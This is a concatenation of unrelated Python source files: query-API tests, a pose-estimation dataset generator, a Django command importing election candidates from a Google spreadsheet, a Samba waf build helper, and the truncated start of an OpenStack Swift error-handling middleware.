result = result.get(key)
self.assertIsNot(result, None)
return result
@staticmethod
def _make_query_dict(object_name, type_=None, expression=None, limit=None,
order_by=None):
"""Make a dict with query for object_name with optional parameters."""
def make_filter_expression(expression):
"""Convert a three-tuple to a simple expression filter."""
left, op_name, right = expression
return {"left": left, "op": {"name": op_name}, "right": right}
query = {
"object_name": object_name,
"filters": {"expression": {}},
}
if type_:
query["type"] = type_
if expression:
query["filters"]["expression"] = make_filter_expression(expression)
if limit:
query["limit"] = limit
if order_by:
query["order_by"] = order_by
return query
# pylint: disable=too-many-public-methods
class TestAdvancedQueryAPI(BaseQueryAPITestCase):
"""Basic tests for /query api."""
@classmethod
def setUpClass(cls):
"""Set up test cases for all tests."""
TestCase.clear_data()
# This imported file could be simplified a bit to speed up testing.
cls._import_file("data_for_export_testing.csv")
def test_basic_query_eq(self):
"""Filter by = operator."""
title = "Cat ipsum 1"
programs = self._get_first_result_set(
self._make_query_dict("Program", expression=["title", "=", title]),
"Program",
)
self.assertEqual(programs["count"], 1)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertEqual(programs["values"][0]["title"], title)
def test_basic_query_in(self):
"""Filter by ~ operator."""
title_pattern = "1"
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "~", title_pattern]),
"Program",
)
self.assertEqual(programs["count"], 12)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(all(title_pattern in program["title"]
for program in programs["values"]))
def test_basic_query_ne(self):
"""Filter by != operator."""
title = "Cat ipsum 1"
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "!=", title]),
"Program",
)
self.assertEqual(programs["count"], 22)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(all(program["title"] != title
for program in programs["values"]))
def test_basic_query_not_in(self):
"""Filter by !~ operator."""
title_pattern = "1"
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "!~", title_pattern]),
"Program",
)
self.assertEqual(programs["count"], 11)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(all(title_pattern not in program["title"]
for program in programs["values"]))
def test_basic_query_lt(self):
"""Filter by < operator."""
date = datetime(2015, 5, 18)
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["effective date", "<",
date.strftime(DATE_FORMAT_REQUEST)]),
"Program",
)
self.assertEqual(programs["count"], 9)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(
all(datetime.strptime(program["start_date"],
DATE_FORMAT_RESPONSE) < date
for program in programs["values"]),
)
def test_basic_query_gt(self):
"""Filter by > operator."""
date = datetime(2015, 5, 18)
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["effective date", ">",
date.strftime(DATE_FORMAT_REQUEST)]),
"Program",
)
self.assertEqual(programs["count"], 13)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(
all(datetime.strptime(program["start_date"],
DATE_FORMAT_RESPONSE) > date
for program in programs["values"]),
)
def test_basic_query_text_search(self):
"""Filter by fulltext search."""
text_pattern = "ea"
data = self._make_query_dict("Regulation")
data["filters"]["expression"] = {
"op": {"name": "text_search"},
"text": text_pattern,
}
regulations = self._get_first_result_set(data, "Regulation")
self.assertEqual(regulations["count"], 21)
self.assertEqual(len(regulations["values"]), regulations["count"])
self.assertTrue(all((regulation["description"] and
text_pattern in regulation["description"]) or
(regulation["notes"] and
text_pattern in regulation.get("notes", ""))
for regulation in regulations["values"]))
def test_basic_query_pagination(self):
"""Test basic query with pagination info."""
from_, to_ = 1, 12
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "~", "Cat ipsum"],
order_by=[{"name": "title"}],
limit=[from_, to_]),
"Program",
)
self.assertEqual(programs["count"], to_ - from_)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertEqual(programs["total"], 23)
def test_basic_query_total(self):
"""The value of "total" doesn't depend on "limit" parameter."""
programs_no_limit = self._get_first_result_set(
self._make_query_dict("Program"),
"Program",
)
self.assertEqual(programs_no_limit["count"], programs_no_limit["total"])
from_, to_ = 3, 5
programs_limit = self._get_first_result_set(
self._make_query_dict("Program", limit=[from_, to_]),
"Program",
)
self.assertEqual(programs_limit["count"], to_ - from_)
self.assertEqual(programs_limit["total"], programs_no_limit["total"])
def test_query_limit(self):
"""The limit parameter trims the result set."""
def make_query_dict(limit=None):
"""A shortcut for making queries with different limits."""
return self._make_query_dict("Program", order_by=[{"name": "title"}],
limit=limit)
def check_counts_and_values(programs, from_, to_, count=None):
"""Make a typical assertion set for count, total and values."""
if count is None:
count = to_ - from_
self.assertEqual(programs["count"], count)
self.assertEqual(programs["total"], programs_no_limit["total"])
self.assertEqual(programs["values"],
programs_no_limit["values"][from_:to_])
programs_no_limit = self._get_first_result_set(
make_query_dict(),
"Program",
)
self.assertEqual(programs_no_limit["count"], programs_no_limit["total"])
programs_0_10 = self._get_first_result_set(
make_query_dict(limit=[0, 10]),
"Program",
)
check_counts_and_values(programs_0_10, from_=0, to_=10)
programs_10_21 = self._get_first_result_set(
make_query_dict(limit=[10, 21]),
"Program",
)
check_counts_and_values(programs_10_21, from_=10, to_=21)
programs_10_top = self._get_first_result_set(
make_query_dict(limit=[10, programs_no_limit["total"] + 42]),
"Program",
)
check_counts_and_values(programs_10_top, from_=10, to_=None,
count=programs_no_limit["total"] - 10)
# check if a valid integer string representation gets casted
programs_10_21_str = self._get_first_result_set(
make_query_dict(limit=[10, "21"]),
"Program",
)
programs_10_str_21 = self._get_first_result_set(
make_query_dict(limit=["10", 21]),
"Program",
)
self.assertDictEqual(programs_10_21_str, programs_10_21)
self.assertDictEqual(programs_10_str_21, programs_10_21)
def test_query_invalid_limit(self):
"""Invalid limit parameters are handled properly."""
# invalid "from"
self.assert400(self._post(
self._make_query_dict("Program", limit=["invalid", 12]),
))
# invalid "to"
self.assert400(self._post(
self._make_query_dict("Program", limit=[0, "invalid"]),
))
# "from" >= "to"
self.assert400(self._post(
self._make_query_dict("Program", limit=[12, 0]),
))
# negative "from"
self.assert400(self._post(
self._make_query_dict("Program", limit=[-2, 10]),
))
# negative "to"
self.assert400(self._post(
self._make_query_dict("Program", limit=[2, -10]),
))
def test_query_order_by(self):
"""Results get sorted by own field."""
# assumes unique title
def get_titles(programs):
return [program["title"] for program in programs]
programs_default = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title"}]),
"Program", "values",
)
titles_default = get_titles(programs_default)
programs_asc = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title", "desc": False}]),
"Program", "values",
)
titles_asc = get_titles(programs_asc)
programs_desc = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title", "desc": True}]),
"Program", "values",
)
titles_desc = get_titles(programs_desc)
# the titles are sorted ascending with desc=False
self.assertListEqual(titles_asc, sorted(titles_asc))
# desc=False by default
self.assertListEqual(titles_default, titles_asc)
# the titles are sorted descending with desc=True
self.assertListEqual(titles_desc, list(reversed(titles_asc)))
def test_order_by_several_fields(self):
"""Results get sorted by two fields at once."""
regulations = self._get_first_result_set(
self._make_query_dict("Regulation",
order_by=[{"name": "notes", "desc": True},
{"name": "title"}]),
"Regulation", "values",
)
regulations_unsorted = self._get_first_result_set(
self._make_query_dict("Regulation"),
"Regulation", "values",
)
self.assertListEqual(
regulations,
sorted(sorted(regulations_unsorted,
key=itemgetter("title")),
key=itemgetter("notes"),
reverse=True),
)
def test_order_by_related_titled(self):
"""Results get sorted by title of related Titled object."""
audits_title = self._get_first_result_set(
self._make_query_dict("Audit",
order_by=[{"name": "program"}, {"name": "id"}]),
"Audit", "values",
)
audits_unsorted = self._get_first_result_set(
self._make_query_dict("Audit"),
"Audit", "values",
)
# get titles from programs to check ordering
programs = self._get_first_result_set(
self._make_query_dict("Program"),
"Program", "values",
)
program_id_title = {program["id"]: program["title"]
for program in programs}
self.assertListEqual(
audits_title,
sorted(sorted(audits_unsorted, key=itemgetter("id")),
key=lambda a: program_id_title[a["program"]["id"]]),
)
def test_order_by_related_person(self):
"""Results get sorted by name or email of related Person object."""
clauses_person = self._get_first_result_set(
self._make_query_dict("Clause",
order_by=[{"name": "contact"}, {"name": "id"}]),
"Clause", "values",
)
clauses_unsorted = self._get_first_result_set(
self._make_query_dict("Clause"),
"Clause", "values",
)
# get names and emails from people to check ordering
people = self._get_first_result_set(
self._make_query_dict("Person"),
"Person", "values",
)
person_id_name = {person["id"]: (person["name"], person["email"])
for person in people}
self.assertListEqual(
clauses_person,
sorted(sorted(clauses_unsorted, key=itemgetter("id")),
key=lambda c: person_id_name[c["contact"]["id"]]),
)
def test_query_order_by_owners(self):
"""Results get sorted by name or email of the (first) owner."""
# TODO: the test data set lacks objects with several owners
policies_owner = self._get_first_result_set(
self._make_query_dict("Policy",
order_by=[{"name": "owners"}, {"name": "id"}]),
"Policy", "values",
)
policies_unsorted = self._get_first_result_set(
self._make_query_dict("Policy"),
"Policy", "values",
)
people = self._get_first_result_set(
self._make_query_dict("Person"),
"Person", "values",
)
person_id_name = {person["id"]: (person["name"], person["email"])
for person in people}
policy_id_owner = {policy["id"]: person_id_name[policy["owners"][0]["id"]]
for policy in policies_unsorted}
self.assertListEqual(
policies_owner,
sorted(sorted(policies_unsorted, key=itemgetter("id")),
key=lambda p: policy_id_owner[p["id"]]),
)
def test_query_count(self):
"""The value of "count" is same for "values" and "count" queries."""
programs_values = self._get_first_result_set(
self._make_query_dict("Program", type_="values"),
"Program",
)
programs_count = self._get_first_result_set(
self._make_query_dict("Program", type_="count"),
"Program",
)
self.assertEqual(programs_values["count"], programs_count["count"])
def test_query_ids(self):
"""The ids are the same for "values" and "ids" queries."""
programs_values = self._get_first_result_set(
self._make_query_dict("Program", type_="values"),
"Program",
)
programs_ids = self._get_first_result_set(
self._make_query_dict("Program", type_="ids"),
"Program",
)
self.assertEqual(
set(obj.get("id") for obj in programs_values["values"]),
set(programs_ids["ids"]),
)
@SkipTest
def test_self_link(self):
# It would be good if the api accepted get requests and we could add the
# query into a get parameter, then each request would also get a self link
# that could be tested to see that it truly returns what the original
# request was.
# In the end, instead of returning mapped object stubs like we do now, we'd
# just return a self link for fetching those objects.
pass
def test_multiple_queries(self):
"""Multiple queries POST is identical to multiple single-query POSTs."""
data_list = [
self._make_query_dict("Program",
order_by=[{"name": "title"}],
limit=[1, 12],
expression=["title", "~", "Cat ipsum"]),
self._make_query_dict("Program",
type_="values"),
self._make_query_dict("Program",
type_="count"),
self._make_query_dict("Program",
type_="ids"),
self._make_query_dict("Program",
type_="ids",
expression=["title", "=", "Cat ipsum 1"]),
self._make_query_dict("Program",
expression=["title", "~", "1"]),
self._make_query_dict("Program",
expression=["title", "!=", "Cat ipsum 1"]),
self._make_query_dict("Program",
expression=["title", "!~", "1"]),
self._make_query_dict("Program",
expression=["effective date", "<",
"05/18/2015"]),
self._make_query_dict("Program",
expression=["effective date", ">",
"05/18/2015"]),
{
"object_name": "Regulation",
"fields": ["description", "notes"],
"filters": {
"expression": {
"op": {"name": "text_search"},
"text": "ea",
},
},
},
]
response_multiple_posts = [json.loads(self._post(data).data)[0]
for data in data_list]
response_single_post = json.loads(self._post(data_list).data)
self.assertEqual(response_multiple_posts, response_single_post)
class TestQueryWithCA(BaseQueryAPITestCase):
"""Test query API with custom attributes."""
def setUp(self):
"""Set up test cases for all tests."""
TestCase.clear_data()
self._generate_cad()
self._import_file("sorting_with_ca_setup.csv")
self.client.get("/login")
@staticmethod
def _generate_cad():
"""Generate custom attribute definitions."""
factories.CustomAttributeDefinitionFactory(
title="CA dropdown",
definition_type="program",
multi_choice_options="one,two,three,four,five",
)
factories.CustomAttributeDefinitionFactory(
title="CA text",
definition_type="program",
)
@staticmethod
def _flatten_cav(data):
"""Unpack CAVs and put them in data as object attributes."""
cad_names = dict(db.session.query(CAD.id, CAD.title))
for entry in data:
for cav in entry.get("custom_attribute_values", []):
entry[cad_names[cav["custom_attribute_id"]]] = cav["attribute_value"]
return data
def _get_first_result_set(self, *args, **kwargs):
"""Call this method from super and flatten CAVs additionally."""
return self._flatten_cav(
super(TestQueryWithCA, self)._get_first_result_set(*args, **kwargs),
)
def test_single_ca_sorting(self):
"""Results get sorted by single custom attribute field."""
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title"}]),
"Program", "values",
)
keys = [program["title"] for program in programs]
self.assertEqual(keys, sorted(keys))
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "CA text"}]),
"Program", "values",
)
keys = [program["CA text"] for program in programs]
self.assertEqual(keys, sorted(keys))
def test_mixed_ca_sorting(self):
"""Test sorting by multiple fields with CAs."""
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "CA text"},
{"name": "title"}]),
"Program", "values",
)
keys = [(program["CA text"], program["title"]) for program in programs]
self.assertEqual(keys, sorted(keys))
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title"},
{"name": "CA text"}]),
"Program", "values",
)
keys = [(program["title"], program["CA text"]) for program in programs]
self.assertEqual(keys, sorted(keys))
def test_multiple_ca_sorting(self):
"""Test sorting by multiple CA fields"""
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "CA text"},
{"name": "CA dropdown"}]),
"Program", "values",
)
keys = [(prog["CA text"], prog["CA dropdown"]) for prog in programs]
self.assertEqual(keys, sorted(keys))
class TestQueryWithUnicode(BaseQueryAPITestCase):
"""Test query API with unicode values."""
def setUp(self):
"""Set up test cases for all tests."""
TestCase.clear_data()
self._generate_cad()
self._import_file("querying_with_unicode.csv")
self.client.get("/login")
@staticmethod
def _generate_cad():
"""Generate custom attribute definitions."""
factories.CustomAttributeDefinitionFactory(
title=u"CA список",
definition_type="program",
multi_choice_options=u"один,два,три,четыре,пять",
)
factories.CustomAttributeDefinitionFactory(
title=u"CA текст",
definition_type="program",
)
@staticmethod
def _flatten_cav(data):
"""Unpack CAVs and put them in data as object attributes."""
cad_names = dict(db.session.query(CAD.id, CAD.title))
for entry in data:
for cav in entry.get("custom_attribute_values", []):
entry[cad_names[cav["custom_attribute_id"]]] = cav["attribute_value"]
return data
def test_query(self):
"""Test query by unicode value."""
title = u"программа A"
programs = self._get_first_result_set(
self._make_query_dict("Program", expression=["title", "=", title]),
"Program",
)
self.assertEqual(programs["count"], 1)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertEqual(programs["values"][0]["title"], title)
def test_sorting_by_ca(self):
"""Test sorting by CA fields with unicode names."""
programs = self._flatten_cav(
self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": u"CA текст"},
{"name": u"CA список"}]),
"Program", "values",
)
)
keys = [(prog[u"CA текст"], prog[u"CA список"]) for prog in programs]
self.assertEqual(keys, sorted(keys))
|
import numpy as np
import h5py
import getopt, sys, time
import img
import draw
import ref
import segment
def gendefault(annot, idx, img_in, chg=None):
# Initialize sample parameters
c = annot['center'][idx]
s = annot['scale'][idx]
flip, r = False, 0
flip_idxs = ref.flipped_parts[annot.attrs['name']]
# Handle data augmentation
if chg is not None:
# Flipping
if 'flip' in chg:
if np.random.rand() < .5:
flip = True
# Scaling
if 'scale' in chg:
s *= min(1+chg['scale'], max(1-chg['scale'], (np.random.randn() * chg['scale']) + 1))
# Rotation
if 'rotate' in chg:
if chg['rotate'] == -1:
# Force vertical orientation
r = annot['torsoangle'][idx]
else:
r = np.random.randint(-chg['rotate'], chg['rotate'] + 1)
# Translation
if 'translate' in chg:
for i in xrange(2):
offset = np.random.randint(-chg['translate'], chg['translate'] + 1)
c[i] += offset
# Generate input image
cropped = img.crop(img_in, c, s, ref.in_res, rot=r)
inp = np.zeros((3, ref.in_res[0], ref.in_res[1]))
for i in xrange(3):
inp[i, :, :] = cropped[:, :, i]
# Generate part heatmap output
num_parts = annot['part'].shape[1]
out = np.zeros((num_parts, ref.out_res[0], ref.out_res[1]))
for i in xrange(num_parts):
pt = annot['part'][idx,i]
if pt[0] > 0:
draw.gaussian(out[i], img.transform(pt, c, s, ref.out_res, rot=r), 2)
# Flip sample
if flip:
inp = np.array([np.fliplr(inp[i]) for i in xrange(len(inp))])
out = np.array([np.fliplr(out[flip_idxs[i]]) for i in xrange(len(out))])
return inp,out
def gendetect(annot, idx, img_in, chg=None):
img_c = [img_in.shape[1]/2, img_in.shape[0]/2]
img_s = max(img_in.shape) / 200
flip, r = False, 0
idxs = np.where(annot['index'][:] == annot['index'][idx])[0]
# Handle data augmentation
if chg is not None:
# Flipping
if 'flip' in chg:
if np.random.rand() < .5:
flip = True
# Scaling
if 'scale' in chg:
img_s *= min(1+chg['scale'], max(1-chg['scale'], (np.random.randn() * chg['scale']) + 1))
# Rotation
# if 'rotate' in chg:
# r = np.random.randint(-chg['rotate'], chg['rotate'] + 1)
# Translation
if 'translate' in chg:
for i in xrange(2):
offset = np.random.randint(-chg['translate'], chg['translate'] + 1)
c[i] += offset
img_c[0] += img_s * np.random.randint(-10,10)
img_c[1] += img_s * np.random.randint(-10,10)
cropped = img.crop(img_in, img_c, img_s, ref.in_res)
inp = np.zeros((3, ref.in_res[0], ref.in_res[1]))
for i in xrange(3): inp[i, :, :] = cropped[:, :, i]
out = np.zeros((2, ref.out_res[0], ref.out_res[1]))
for i in idxs:
pt = img.transform(annot['center'][i], img_c, img_s, ref.out_res)
draw.gaussian(out[0], pt, 1)
out[1,pt[1]-1:pt[1]+1,pt[0]-1:pt[0]+1] = annot['scale'][i] / img_s
if flip:
inp = np.array([np.fliplr(inp[i]) for i in xrange(len(inp))])
out = np.array([np.fliplr(out[i]) for i in xrange(len(out))])
return inp,out
def gencascade(annot, idx, img_in, chg=None, extra_args=None):
jnt1 = extra_args[0]
jnt2 = extra_args[1]
pt1 = annot['part'][idx,jnt1]
pt2 = annot['part'][idx,jnt2]
if pt1.min() <= 0 or pt2.min() <= 0:
return np.zeros((3,ref.out_res[0],ref.out_res[1])), np.zeros((2,ref.out_res[0],ref.out_res[1]))
else:
return img.two_pt_crop(img_in, annot['scale'][idx], pt1, pt2, 1.8, ref.out_res, chg)
def gensample(annot, idx, chg=None, sampletype='default', extra_args=None):
img_in = ref.loadimg(annot, idx)
if sampletype == 'default':
return gendefault(annot, idx, img_in, chg)
elif sampletype == 'detect':
return gendetect(annot, idx, img_in, chg)
elif sampletype == 'cascade':
return gencascade(annot, idx, img_in, chg, extra_args)
def generateset(dataset, settype, filename, numsamples, datadir=None, chg=None, sampletype='default', idxs=None, extra_args=None):
# Generate full hdf5 dataset
# Path to output file
if datadir is None:
filepath = ref.posedir + '/data/' + dataset + '/' + filename + '.h5'
else:
filepath = datadir + '/' + dataset + '/' + filename + '.h5'
# Load in annotations
annot = ref.load(dataset, settype)
# Option to strictly follow the order of the provided annotations
# Useful for generating test sets.
if idxs is None:
numavailable = len(annot['index']) # Number of available samples
else:
numavailable = len(idxs)
inorder = False
if numsamples == -1:
numsamples = numavailable
inorder = True
print ""
print "Generating %s %s set: %s" % (dataset, sampletype, settype)
print "Path to dataset: %s" % filepath
print "Number of samples: %d" % numsamples
print "Data augmentation: %s" % (str(chg))
# Data/label sizes can be all over the place, this is the easiest way to check
ex_in, ex_out = gensample(annot, 0, chg=chg, sampletype=sampletype, extra_args=extra_args)
# Initialize numpy arrays to hold data
data = np.zeros((numsamples, ex_in.shape[0], ex_in.shape[1], ex_in.shape[2]), np.float32)
label = np.zeros((numsamples, ex_out.shape[0], ex_out.shape[1], ex_out.shape[2]), np.float32)
ref_idxs = np.zeros((numsamples, 1), np.float32)
# Loop to generate new samples
print ''
print '| Progress |'
print '|',
sys.stdout.flush()
starttime = time.time()
for i in xrange(numsamples):
if idxs is not None: idx = idxs[i]
elif inorder: idx = i
else: idx = np.random.randint(numavailable)
data[i], label[i] = gensample(annot, idx, chg=chg, sampletype=sampletype, extra_args=extra_args)
ref_idxs[i] = idx
if i % (numsamples/10) == 0:
print '=',
sys.stdout.flush()
print '|'
print ''
print 'Done!',
print '(%.2f seconds to complete.)' % (time.time() - starttime)
print ''
# Write out to hdf5 files
with h5py.File(filepath, 'w') as f:
f['data'] = data
f['label'] = label
f['index'] = ref_idxs
def helpmessage():
print "Extra flags:"
print " -d, --dataset :: Datset choice (mpii or flic), REQUIRED"
print " -o, --outfile :: Output file for data (do not include '.h5'), REQUIRED"
print " -p, --prefix :: Directory to save to (no need to include dataset name)"
print " -t, --type :: Dataset type (train or test), default is train"
print " -n, --numsamples :: Number of samples to generate, default is all available (-1) for test and 100 for train"
print ""
print "Augmentation options: (default Tompson's options for train, none for test)"
print " -m, --move :: Translate (0 - 50)"
print " -z, --zoom :: Scale (0.0 - 1.0)"
print " -r, --rotate :: Rotate (-1 for fixed vertical, 0-180 for max distortion)"
print " (Tompson's options are: -m 0 -z .5 -r 20"
print ""
print "Other dataset types:"
print " -q, --detect"
print " -c, --cascade :: Provide first joint as argument, must use additional argument below"
print " -j, --pairedjoint :: Provide second joint to be used with 'cascade'"
print ""
print "Additional limb heatmap output:"
print " -s, --segment :: - 0 No limb segment output (default)"
print " - 1 Does not distinguish parts, angle == angle + 180"
print " - 2 Distinguishes different part types, angle == angle + 180"
print " - 3 Distinguishes different part types, angle != angle + 180"
sys.exit(2)
def main(argv):
# Default values
dataset = None
datadir = None
outfile = None
numsamples = 100
settype = 'train'
chg = None
sampletype = 'default'
jnt1 = -1
jnt2 = -1
extra = None
# Process command line arguments
try:
opts, args = getopt.getopt(argv, "hd:o:p:t:n:m:z:r:s:qc:j:", ["help", "dataset=", "outfile=", "prefix=", "type=",
"numsamples=", "move=", "zoom=", "rotate=",
"segment=", "detect", "cascade=", "pairedjoint="])
except getopt.GetoptError:
print "Incorrect arguments"
helpmessage()
sys.exit()
for opt,arg in opts:
# Help
if opt in ('-h','--help'):
helpmessage()
# Dataset choice
elif opt in ('-d','--dataset'):
dataset = arg
if not (dataset in ['mpii', 'flic']):
print "Bad argument for --dataset"
helpmessage()
# Output file
elif opt in ('-o','--outfile'):
outfile = arg
# Prefix
elif opt in ('-p','--prefix'):
datadir = arg
# Set type
elif opt in ('-t','--type'):
settype = arg
if not (settype in ['train','test','valid','train_obs','test_obs']):
print "Bad argument for --type"
helpmessage()
# Number of samples
elif opt in ('-n','--numsamples'):
numsamples = int(arg)
if numsamples < -1:
print "Bad argument for --numsamples"
helpmessage()
# Move
elif opt in ('-m','--move'):
move = int(arg)
if not 0 <= move <= 50:
print "Bad argument for --move"
helpmessage()
else:
if chg is None:
chg = {}
chg['translate'] = move
# Zoom
elif opt in ('-z','--zoom'):
zoom = float(arg)
if not 0 <= zoom <= 1:
print "Bad argument for --zoom"
helpmessage()
else:
if chg is None:
chg = {}
chg['scale'] = zoom
# Rotate
elif opt in ('-r','--rotate'):
rot = int(arg)
if not -1 <= rot <= 180:
print "Bad argument for --rotate"
helpmessage()
else:
if chg is None:
chg = {}
chg['rotate'] = rot
# Segment
elif opt in ('-s','--segment'):
seg = int(arg)
if not (0 <= seg <= 3):
print "Bad argument for --segment"
helpmessage()
# Detect
elif opt in ('-q','--detect'):
sampletype = 'detect'
# Cascade
elif opt in ('-c','--cascade'):
sampletype = 'cascade'
jnt1 = int(arg)
elif opt in ('-j','--pairedjoint'):
jnt2 = int(arg)
if dataset is None:
print "No dataset chosen."
helpmessage()
if outfile is None:
print "No output filename chosen."
helpmessage()
if settype in ['test','test_obs']:
# Test set has a standard number of images, and no augmentation
numsamples = -1
elif settype == 'train' and chg is None:
if sampletype == 'default': chg = {'rotate':20, 'scale':.5}
elif sampletype == 'cascade': chg = {'rotate':20,'scale':.2, 'translate':20}
else: chg = {}
chg['flip'] = True
# If we're generating cascade data make sure two joints have been provided
if sampletype == 'cascade':
if jnt1 == -1 or jnt2 == -1:
print "Need two joints to generate cascade data"
helpmessage()
extra = [jnt1, jnt2]
generateset(dataset, settype, outfile, numsamples, datadir=datadir, chg=chg, sampletype=sampletype, extra_args=extra)
if __name__ == "__main__":
main(sys.argv[1:])
|
import requests
import csv
from io import StringIO
from django.core.management.base import BaseCommand
from django.template.defaultfilters import slugify
from candidates.views.version_data import get_change_metadata
from elections.models import Election
import memcache
UNKNOWN_PARTY_ID = 'unknown'
GOOGLE_DOC_ID = '1yme9Y9Vt876-cVR9bose3QDqF7j8hqLnWYEjO3HUqXs'
def get_existing_popit_person(person_id):
from candidates.models import PopItPerson
from candidates.popit import get_search_url
# See if this person already exists by searching for the
# ID they were imported with:
query_format = \
'identifiers.identifier:"{id}" AND ' + \
'identifiers.scheme:"{scheme}"'
search_url = get_search_url(
'persons',
query_format.format(
id=person_id, scheme='import-id'
),
embed='membership.organization'
)
results = requests.get(search_url).json()
total = results['total']
if total > 1:
message = "Multiple matches for CI ID {0}"
raise Exception(message.format(person_id))
if total == 0:
return None
# Otherwise there was exactly one result:
return PopItPerson.create_from_dict(results['result'][0])
class Command(BaseCommand):
help = "Load or update St. Paul candidates from Google docs"
def handle(self, **options):
from slumber.exceptions import HttpClientError
from candidates.cache import get_post_cached, UnknownPostException
from candidates.election_specific import PARTY_DATA, shorten_post_label
from candidates.models import PopItPerson
from candidates.popit import create_popit_api_object
spreadsheet_url = 'https://docs.google.com/spreadsheets/d/{0}/pub?output=csv'\
.format(GOOGLE_DOC_ID)
candidate_list = requests.get(spreadsheet_url)
content = StringIO(unicode(candidate_list.content))
reader = csv.DictReader(content)
api = create_popit_api_object()
for row in reader:
try:
election_data = Election.objects.get_by_slug('council-member-2015')
ocd_division = election_data.post_id_format.format(area_id=row['Ward'])
post_data = get_post_cached(api, ocd_division)['result']
except (UnknownPostException, memcache.Client.MemcachedKeyCharacterError):
election_data = Election.objects.get_by_slug('school-board-2015')
post_data = get_post_cached(api, election_data.post_id_format)['result']
person_id = slugify(row['Name'])
person = get_existing_popit_person(person_id)
if person:
print("Found an existing person:", row['Name'])
else:
print("No existing person, creating a new one:", row['Name'])
person = PopItPerson()
person.name = row['Name']
# TODO: Get these attributes in the spreadsheet
# person.gender = gender
# if birth_date:
# person.birth_date = str(birth_date)
# else:
# person.birth_date = None
person.email = row['Campaign Email']
person.facebook_personal_url = row["Candidate's Personal Facebook Profile"]
person.facebook_page_url = row['Campaign Facebook Page']
person.twitter_username = row['Campaign Twitter']\
.replace('N', '')\
.replace('N/A', '')\
.replace('http://twitter.com/', '')\
.replace('https://twitter.com/', '')
person.linkedin_url = row['LinkedIn']
person.homepage_url = row['Campaign Website\n']
standing_in_election = {
'post_id': post_data['id'],
'name': shorten_post_label(post_data['label']),
}
if 'area' in post_data:
standing_in_election['mapit_url'] = post_data['area']['identifier']
person.standing_in = {
election_data.slug: standing_in_election
}
if 'dfl' in row['Party'].lower():
party_id = 'party:101'
elif 'green' in row['Party'].lower():
party_id = 'party:201'
elif 'independence' in row['Party'].lower():
party_id = 'party:301'
else:
party_id = 'party:401'
party_name = PARTY_DATA.party_id_to_name[party_id]
person.party_memberships = {
election_data.slug: {
'id': party_id,
'name': party_name,
}
}
person.set_identifier('import-id', person_id)
change_metadata = get_change_metadata(
None,
'Imported candidate from Google Spreadsheet',
)
person.record_version(change_metadata)
try:
person.save_to_popit(api)
# TODO: Get candidate Images
# if image_url:
# enqueue_image(person, user, image_url)
except HttpClientError as hce:
print "Got an HttpClientError:", hce.content
raise
|
# waf build tool for building IDL files with pidl
import Build
from samba_utils import *
from samba_autoconf import *
from Configure import conf
@conf
def SAMBA_CHECK_PYTHON(conf, mandatory=True, version=(2,4,2)):
# enable tool to build python extensions
conf.find_program('python', var='PYTHON', mandatory=mandatory)
conf.check_tool('python')
path_python = conf.find_program('python')
conf.env.PYTHON_SPECIFIED = (conf.env.PYTHON != path_python)
conf.check_python_version(version)
@conf
def SAMBA_CHECK_PYTHON_HEADERS(conf, mandatory=True):
if conf.env["python_headers_checked"] == []:
conf.check_python_headers(mandatory)
conf.env["python_headers_checked"] = "yes"
else:
conf.msg("python headers", "using cache")
def SAMBA_PYTHON(bld, name,
source='',
deps='',
public_deps='',
realname=None,
cflags='',
includes='',
init_function_sentinel=None,
local_include=True,
vars=None,
enabled=True):
'''build a python extension for Samba'''
# when we support static python modules we'll need to gather
# the list from all the SAMBA_PYTHON() targets
if init_function_sentinel is not None:
cflags += '-DSTATIC_LIBPYTHON_MODULES=%s' % init_function_sentinel
source = bld.EXPAND_VARIABLES(source, vars=vars)
if realname is not None:
link_name = 'python_modules/%s' % realname
else:
link_name = None
bld.SAMBA_LIBRARY(name,
source=source,
deps=deps,
public_deps=public_deps,
includes=includes,
cflags=cflags,
local_include=local_include,
vars=vars,
realname=realname,
link_name=link_name,
pyext=True,
target_type='PYTHON',
install_path='${PYTHONARCHDIR}',
allow_undefined_symbols=True,
enabled=enabled)
Build.BuildContext.SAMBA_PYTHON = SAMBA_PYTHON
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from swift import gettext_ as _
from swift.common.swob import Request, HTTPServerError
from swift.common.utils import get_logger, generate_trans_id
from swift.common.wsgi import WSGIContext
class CatchErrorsContext(WSGIContext):
def __init__(self, app, logger, trans_id_suffix=''):
super(CatchErrorsContext, self).__init__(app)
self.logger = logger
self.trans_id_suffix = trans_id_suffix
def handle_request(self, env, start_response):
trans_id = generate_trans_id(self.trans_id_suffix)
env['swift.trans_id'] = trans_id
self.logger.txn_id = trans_id
try:
# catch any errors in the pipeline
resp = self._app_call(env)
except: # noqa
self.logger.exception(_('Error: An error occurred'))
resp = HTTPServerError(request=Request(env),
